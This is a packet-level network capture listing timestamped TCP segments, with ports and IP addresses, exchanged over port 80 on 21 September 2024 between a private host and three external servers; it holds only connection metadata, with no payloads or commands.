Sep 21, 2024 14:48:09.911000013 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911010981 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911021948 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911032915 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911032915 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911046982 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911057949 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911102057 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911113024 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911123037 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911125898 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911144018 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911161900 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911238909 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911248922 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911262035 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911274910 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911299944 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911310911 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911362886 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911372900 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911396027 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911407948 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911417961 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911425114 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911429882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911442041 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911456108 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911470890 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911504984 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911569118 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911580086 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911608934 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911627054 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911721945 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911732912 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911750078 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911757946 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911761999 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911772966 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911776066 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911784887 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911797047 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911803961 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911811113 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911823034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911823988 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911834002 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911842108 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911845922 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911856890 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911864042 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911869049 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911881924 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.911887884 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911953926 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.911953926 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912126064 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912143946 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912156105 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912163973 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912183046 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912195921 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912302017 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912313938 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912323952 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912334919 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912338972 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912348032 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912359953 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912359953 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912383080 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912398100 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912550926 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912561893 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912573099 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912584066 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912591934 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912595987 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.912604094 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.912645102 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.932574987 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932599068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932610035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932622910 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932636976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932656050 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.932679892 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932687998 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.932693005 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932704926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932715893 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932718992 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.932754993 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.932787895 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932800055 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932809114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932828903 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.932921886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932934046 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932944059 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.932949066 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.932965040 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.932986021 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933104038 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933115005 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933125973 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933136940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933145046 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933152914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933166027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933172941 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933176994 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933192015 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933203936 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933214903 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933228970 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933249950 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933267117 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933362961 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933372974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933383942 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933393955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933404922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933413982 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933417082 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933429956 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933437109 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933451891 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933479071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933538914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933584929 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933657885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933667898 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933680058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933691978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933701992 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933706045 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933717966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933718920 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933728933 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933739901 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933752060 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933752060 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933763981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933774948 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933778048 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.933796883 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.933821917 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934020996 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934031963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934043884 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934060097 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934099913 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934176922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934187889 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934197903 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934209108 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934218884 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934222937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934236050 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934247017 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934247017 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934259892 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934271097 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934278011 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934281111 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934294939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934298038 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934307098 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934318066 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934320927 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934330940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934340954 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934344053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934356928 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934357882 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934384108 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934411049 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934715986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934726954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934736967 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934748888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934760094 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934767008 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934787035 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934815884 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934844017 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934854984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934865952 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934876919 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934884071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934890032 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934902906 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934906960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.934937000 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.934950113 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935134888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935153008 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935163975 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935175896 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935179949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935188055 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935199022 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935205936 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935209990 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935221910 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935221910 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935235977 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935242891 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935250044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935261011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935270071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935272932 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935285091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935290098 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935300112 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935318947 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935345888 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935523033 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935534954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935575008 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935597897 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935676098 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935688019 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935698986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935724974 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935725927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935743093 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935753107 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935758114 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935766935 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935779095 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935786009 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935791969 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935801983 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935802937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935817003 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935827971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935831070 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935838938 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935848951 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935849905 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935864925 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935875893 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935880899 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935888052 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935897112 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935904026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935914040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935923100 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935925961 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935942888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935945988 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.935957909 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.935977936 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.936002016 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.936584949 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936595917 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936605930 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936611891 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936616898 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936628103 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936635971 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.936640024 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936650991 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936661005 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.936672926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.936681986 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.936683893 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.936695099 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.936706066 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.936712980 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.936719894 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936721087 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.936731100 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936739922 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.936743975 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936754942 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936758041 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.936763048 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.936769009 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936784029 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.936784029 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.936808109 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.936943054 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937150002 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937161922 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937172890 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937184095 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937191010 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937196970 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937207937 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937220097 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937231064 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937232971 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937246084 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937254906 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937258959 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937264919 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937284946 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937294960 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937300920 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937308073 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937319994 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937324047 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937331915 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937342882 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937350035 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937355042 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937366009 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937371969 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937376976 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937382936 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937395096 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937405109 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937407017 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.937427044 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937439919 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.937474966 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938040018 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938051939 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938061953 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938074112 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938085079 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938086033 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938097954 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938105106 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938112020 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938132048 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938143969 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.938149929 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.938157082 CEST	80	49709	147.45.44.104	192.168.2.9
